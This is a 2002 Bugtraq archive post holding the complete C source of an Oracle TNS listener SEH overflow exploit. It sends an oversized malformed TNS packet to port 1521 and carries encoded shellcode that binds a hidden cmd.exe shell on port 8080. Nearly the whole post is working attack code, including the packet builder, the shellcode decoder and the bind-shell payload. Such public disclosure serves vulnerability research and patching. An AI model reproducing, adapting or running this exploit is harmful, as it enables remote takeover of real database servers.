Bugtraq mailing list archives
Oracle TNS SEH Exploit
From: <benjurry () xfocus org>
Date: Wed, 27 Nov 2002 00:54:46 +0800
/*Oracle TNS SEH Exploit By Benjurry. Oracle Remote Vulnerability discoveried by COVERT Labs Code by benjurry,benjurry () xfocus org Welcome to http://www.xfocus.net & http://www.xfocus.org Thank my friends:Batman,xq and Yuange. Thank members of Xfocus. This Exploit only test on Win2k Chinese +sp2 and Oracle 8.1.7 2001.7.20 */ #include <stdio.h> #include <winsock2.h> #include <windows.h> #include <stdlib.h> #pragma comment (lib,"Ws2_32") #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x20 #define BUFFSIZE 0x1b00 #define RETEIPADDRESS 0x0 #define SHELLPORT 0x1f90 //shell port =8080 #define PORT 1521 void shellcodefnlock(); void shellcodefn(); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); int main(int argc, char *argv[]) { char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "wsock32.dll""\x0""socket""\x0" "bind""\x0""listen""\x0" "accept""\x0""send""\x0" "recv""\x0""ioctlsocket""\x0" "closesocket""\x0" "cmd.exe""\x0""exit\x0d\x0a""\x0" "strend"; char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char cmd1[]="(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=status)(ARGUMENTS=3)(SERVICE="; char cmd2[]="1)(VERSION=1)))"; char head[]="\x00\x59\x00\x00\x01\x00\x00\x00\x01\x36" "\x01\x2c\x00\x00\x08\x00\x7f\xff\x7f\x08\x00\x00\x00\x01" "\x00\x1f\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x34\xe6\x00\x00\x00\x01\x00\x00" "\x00\x00\x00\x00\x00\x00"; char eipwinnt[]="\x63\x0d\xfa\x7f"; // jmp ebx char JMPNEXTJMP[]="\xeb\x06\x90\x90"; char JMPSHELL[]="\xe9\x2a\xe7\xff\xff"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; char *shellcodefnadd,*chkespadd; unsigned char temp; int OVERADD2=6346; char buffer2[BUFFSIZE]; int ret; int packetlength; int cmdlength; int tt,shellcodeport,sendpacketlong; int i,j,k; int OVERADD=0; WSADATA WSAData; struct hostent *ht; struct sockaddr_in server; memset(buff,NOPCODE,BUFFSIZE); printf("Oracle Remote Vulnerability discoveried by COVERT Labs\n"); printf("Code by benjurry,benjurry () xfocus org\n"); printf("Welcome to http://www.xfocus.net\n";); if(argc<2) { printf("useage:%s target\n",argv[0]); exit(1); } if((tt=WSAStartup(MAKEWORD(1,1), &WSAData)) != 0) { printf("WSAStartup failed.\n"); tt=GetLastError(); WSACleanup(); exit(1); } if((ht = gethostbyname(argv[1]))==0) { printf("Unable to resolve host %s\n",argv[1]); exit(1); } server.sin_port = htons(PORT); server.sin_family=AF_INET; server.sin_addr=*((struct in_addr *)ht->h_addr); if((ret = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to set up socket\n"); exit(1); } if((connect(ret, (struct sockaddr *) &server, sizeof(server))) == -1) { printf("Unable to connect\n"); exit(1); } else printf("Connected.\n"); _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=(char *)_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=(char *)shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,'\x42',BUFFSIZE); for(i=0;i<NOPLONG;i++) buff[i]='\x90'; memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=(char *)shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); shellcodeport=SHELLPORT; shellcodeport=htons(shellcodeport); *(u_short *)(shellcodebuff+k)=shellcodeport; fprintf(stderr,"\n shellport %d",htons(shellcodeport)); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i<sendpacketlong;++i){ temp=shellcodebuff[i]; if(temp<=0x10||temp=='0'){ buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } memcpy(buff+OVERADD2,JMPNEXTJMP,4); // } memcpy(buff+OVERADD2+4,eipwinnt,4); memcpy(buff+OVERADD2+8,JMPSHELL,5); for(i=OVERADD2+13;i<BUFFSIZE;i++) buff[i]='\x90'; memset(buffer2,'\x90',sizeof(buffer2)); memcpy(buffer2,head,sizeof(head)-1); memcpy(buffer2+sizeof(head)-1,cmd1,sizeof(cmd1)-1); memcpy(buffer2+sizeof(head)-1+sizeof(cmd1)-1,buff,sizeof(buff)); memcpy(buffer2+sizeof(head)+sizeof(cmd1)+sizeof(buff)-3,cmd2,sizeof(cmd2)-1); packetlength=58+sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3; cmdlength=sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3; buffer2[0]=packetlength>> 8; buffer2[1]=packetlength & 0xff; buffer2[24]=cmdlength>>8; buffer2[25]=cmdlength& 0xff; if(send(ret, buffer2, packetlength, 0) == -1) { printf("Unable to send\n"); exit(1); } else { printf("code sented...\n"); } Sleep(1000); closesocket(ret); return 0; } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop jmp next getediadd: pop EDI push EDI pop ESI xor ecx,ecx mov cx,0x0fd0 looplock: lodsb cmp al,0x30 jnz sto lodsb sub al,0x40 sto: stosb loop looplock jmp shell next: call getediadd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } /*bind cmd.exe */ void shellcodefn() { char Buff[0x800]; int *except[3]; FARPROC closesocketadd; FARPROC ioctlsocketadd; FARPROC recvadd; FARPROC sendadd; FARPROC acceptadd; FARPROC listenadd; FARPROC bindadd; FARPROC socketadd; // FARPROC WSAStartupadd; FARPROC NOPNOP; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; char *stradd; int imgbase,fnbase,k,l; HANDLE libhandle; //libwsock32; STARTUPINFO siinfo; SOCKET listenFD,clientFD; struct sockaddr_in server; int iAddrSize = sizeof(server); int lBytesRead; u_short shellcodeport; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){ k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto die ; shellcodeport=*(u_short *)stradd; stradd+=2; for(k=1;k<17;++k) { if(k==8) libhandle=procloadlib(stradd); else apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if(*(stradd)==0&&*(stradd+1)!=0) break; } ++stradd; } // WSAStartupadd(MAKEWORD(1, 1), &wsaData); listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port =shellcodeport; //SHELLPORT; server.sin_addr.s_addr=0; k=1; while(k!=0){ k=bindadd(listenFD,&server,sizeof(server)); server.sin_port+=0x100; if(server.sin_port<0x100) ++server.sin_port; } listenadd(listenFD,10); while(1){ sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; // k=0; // while(k==0) // { k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); // stradd+=8; // } PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); clientFD=acceptadd(listenFD,&server,&iAddrSize); while(1) { PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead>0) { ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0); else sendadd(clientFD,stradd,8,0); } else { lBytesRead=recvadd(clientFD,Buff,1024,0); if(lBytesRead<=0){ // CloseHandleadd(ProcessInformation.hProcess); //.dwProcessId); lBytesRead=6; WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0); closesocketadd(clientFD); break; } else{ sendadd(clientFD,Buff,lBytesRead,0); WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); } } } } die: goto die ; _asm{ getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } }
Current thread:
- Oracle TNS SEH Exploit benjurry (Nov 26)